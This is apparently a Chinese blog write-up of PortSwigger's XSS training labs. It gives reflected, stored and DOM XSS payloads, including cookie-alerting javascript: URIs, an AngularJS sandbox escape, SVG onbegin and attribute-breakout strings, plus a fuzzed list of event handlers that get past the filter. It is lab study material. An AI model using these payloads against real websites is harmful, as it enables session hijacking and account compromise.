首页 > 其他分享 >bp靶场之xss

bp靶场之xss

时间:2024-11-11 10:09:43浏览次数:1  
标签:xss 回显 XSS alert HTML bp 靶场 payload

靶场链接

https://portswigger.net/web-security/all-labs
xss备忘录:https://portswigger.net/web-security/cross-site-scripting/cheat-sheet

将 XSS 反射到 HTML 上下文中,无需任何编码

搜索123后,url上出现123,页面也直接回显123,说明可能有反射xss

https://0a1a0050044ea608c4717d8200b200b4.web-security-academy.net/?search=<script>alert('1');</script>

将 XSS 存储到 HTML 上下文中,且不包含任何编码

document.write使用源的接收器中的 DOM XSSlocation.search

输入任意内容,打开f12再ctrl+f搜索看回显位置

img标签中也会回显我们的内容,构造"><img src="x" one rror=alert('1')>闭合原img并触发xss

innerHTML使用源的接收器中的 DOM XSSlocation.search

<img src=1 one rror=alert(1)>

使用源在 jQuery 锚点href属性接收器中执行 DOM XSSlocation.search

反馈页面修改returnPath参数实现反射xss
https://0a0600530390dfa08076a86d00b700f7.web-security-academy.net/feedback?returnPath=javascript:alert(document.cookie)

jQuery 选择器接收器中使用 hashchange 事件的 DOM XSS

将 XSS 反射到带有尖括号 HTML 编码的属性中


输入,出现在url中,页面有两处回显。上面的回显中<'>/都被编码了,下面的只有<>被编码。
"onmouseover="alert(1)

href存储型 XSS漏洞利用到带双引号 HTML 编码的锚点属性中

尽可能的插入payload,看看哪里有回显以及每处被编码了哪些标点符号

三处回显,其中后面两处标点符号都被转义了

第一个回显处是<a href="网址">,填网址处写payload:javascript:alert('1')

反射式 XSS 漏洞利用到带有尖括号 HTML 编码的 JavaScript 字符串中

先输入最简单的payload:,ctrl+f搜索回显的地方

官方wp,payload'-alert(1)-'

在 select 元素中document.write使用源在接收器中执行 DOM XSSlocation.search

根据题目,直接f12,ctrl+shift+f全局搜索location.search。直接从url中提取storeId并回显在页面中

在原url后面拼接storeId=qaxtest,可以看到页面中直接回显

拼接

AngularJS 表达式中带有尖括号和双引号的 DOM XSS HTML 编码

就一处回显,标点符号全部被转义

官方wp,payload:{{$on.constructor('alert(1)')()}}

大概意思就是如果被包含ng-app中,可以用ng-app特有的AngularJS 指令来xss

反射 DOM XSS


存储型 DOM XSS

将 XSS 反射到 HTML 上下文中,大多数标签和属性均被阻止


发到intruder模块根据xss备忘录爆破标签,发现仅有body标签可用。body标签常用弹窗payload:,被拦截,再根据xss备忘录爆破事件。
可用事件:

onbeforeinput
onbeforetoggle
ondragexit
onformdata
onpointercancel
onratechange
onresize
onscrollend
onsuspend
onwebkitmouseforcechanged
onwebkitmouseforcedown
onwebkitmouseforceup
onwebkitmouseforcewillbegin
onwebkitplaybacktargetavailabilitychanged
onwebkitwillrevealbottom

将 XSS 反射到 HTML 上下文中,除自定义标签外,所有标签均被阻止


payload:%3Cxss+id%3Dx+onfocus%3Dalert%28document.cookie%29%20tabindex=1%3E#x';

允许使用一些 SVG 标记的反射型 XSS

按照上面方式fuzz标签、事件,发现onbegin事件可用,构造payload:<svg><animatetransform%20onbegin=alert(1)>

规范链接标签中的反射型 XSS

网页会将url回显在href中,最终导致xss

官方wp

payload:%27accesskey=%27x%27onclick=%27alert(1)
'accesskey='x'onclick='alert(1)第一个单引号用于闭合href,最终网页渲染出来href='https://0a7a007004af13aa80a0ee6d00bf007a.web-security-academy.net/?'accesskey='x'onclick='alert(1)',当按下按键就会触发事件。

反射型 XSS 漏洞存在于带有单引号和反斜杠转义的 JavaScript 字符串中

官方wp:</script><script>alert(1)</script>
重点关注下面的地方没有被转义

反射式 XSS 漏洞存在于带有尖括号和双引号的 JavaScript 字符串中,该字符串经过 HTML 编码,单引号已转义

下面回显处\没有被转义,利用其将转义符号变成普通符号

原本转义单引号,在单引号前面加了一个

\'将转义符\变成普通符号

存储型 XSSonclick事件中带有尖括号和双引号 HTML 编码,以及单引号和反斜杠转义

标签:xss,回显,XSS,alert,HTML,bp,靶场,payload
From: https://www.cnblogs.com/dg05/p/18463483

相关文章

  • Python实现SSA智能麻雀搜索算法优化BP神经网络回归模型(优化权重和阈值)项目实战
    说明:这是一个机器学习实战项目(附带数据+代码+文档+视频讲解),如需数据+代码+文档+视频讲解可以直接到文章最后关注获取。1.项目背景随着人工智能技术的发展,机器学习算法在各个领域的应用越来越广泛。其中,神经网络作为一类重要的机器学习方法,在模式识别、图像处理、自然语言处......
  • webpack5 + vue3 从零配置项目
    前言虽然在实际项目当中很少会从0到1配置一个项目,毕竟很多重复工作是没有必要的,脚手架将这些重复性的工作进行了整合,方便开发者使用。也正因如此,导致部分开发者过于依赖脚手架,却不清楚其内部的实现流程,因此通过从0到1去配置和搭建项目可以更好的理解开发中使用的脚......
  • 打靶记录-红日靶场1
    靶机地址http://vulnstack.qiyuanxuetang.net/vuln/detail/2/按照网络拓扑搭建好环境确认靶机nmap-sn192.168.161.0/24扫开放端口nmap-sT-p-192.168.161.128-oA./ports扫详细信息nmap-sT-sC-sV-O192.168.161.128-p80,3306-oA./detailsnmap--script=vu......
  • 网卡速度突破瓶颈;网卡的速度突破瓶颈与硬盘并不是直接相关的,尽管它们都涉及到数据传输
    网卡的速度突破瓶颈与硬盘并不是直接相关的,尽管它们都涉及到数据传输和网络性能,但它们的瓶颈和优化方向是不同的。1. 网卡速度突破瓶颈网卡(NetworkInterfaceCard)用于计算机与网络之间的通信,网卡的速度突破瓶颈通常指的是网络传输速率的提升。目前,常见的网卡速率有1Gbps(千兆)、......
  • 【网络安全 | 漏洞挖掘】超出范围的域名存在XSS?我是这样提高危害的
    未经许可,不得转载。文章目录正文正文XSS漏洞有时会被忽视,尤其是当域超出范围时。然而,当这种漏洞与跨域资源共享(CORS)配置不当相结合时,它们可能会成为安全项目范围内的有效漏洞,从而有资格获得奖励。为了更好地解释这一点,我将举一个真实的例子,该例子来自我在H......
  • 基于eBPF实现vxlan封装和解封装
    不同于cilium基于Linux内核完成vxlan封装和解封装的逻辑,这里基于eBPF自己完成vxlan封装和解封装,不走Linux内核vxlan模块。tc_ingress和tc_egress加载到主机veth口和主机网口ens33上。eBPF封装vxlan:通过bpf_skb_adjust_room函数,增加ip头+udp头+vxlan头+以太网头。打通跨节点流......
  • 深入解析 Transformers 框架(四):Qwen2.5/GPT 分词流程与 BPE 分词算法技术细节详解
    前面我们已经通过三篇文章,详细介绍了Qwen2.5大语言模型在Transformers框架中的技术细节,包括包和对象加载、模型初始化和分词器技术细节:深入解析Transformers框架(一):包和对象加载中的设计巧思与实用技巧深入解析Transformers框架(二):AutoModel初始化及Qwen2.5模型加载全......
  • 红日七靶场--Writeup
     环境下载地址http://vulnstack.qiyuanxuetang.net/vuln/detail/9/前置配置环境拓扑网络编辑(这里桥接模式的网段不能通第二层也就是52的网段,笔记中桥接模式无法联网所以使用了52的nat网段)DMZ区域:-给Ubuntu(Web1)配置了两个网卡,一个桥接可以对外提供服务;一个连接在......
  • 数学建模_BP神经网络预测新数据模型(多输入单输出)回归预测模型+Matlab代码包教会使用
    基于BP神经网络新数据预测的多输入单输出回归预测模型简介这段代码实现了一个BP神经网络BackpropagationNeuralNetwork用于回归预测任务,并包含新数据的预测功能。该模型通过多层前馈神经网络学习输入特征与目标变量之间的非线性映射关系,并使用反向传播算法优化权重和偏置......
  • 数学建模_BP神经网络模型(多输入单输出)回归预测模型+Matlab代码包教会使用,直接替换
    基于BP神经网络的多输入单输出回归预测模型简介该模型使用了BP神经网络BackpropagationNeuralNetwork进行多输入单输出的回归预测。BP神经网络是一种常见的多层前馈神经网络,通过反向传播算法来优化权重和偏置,从而最小化预测误差。具体模型原理就不再细说了,需要可以翻看......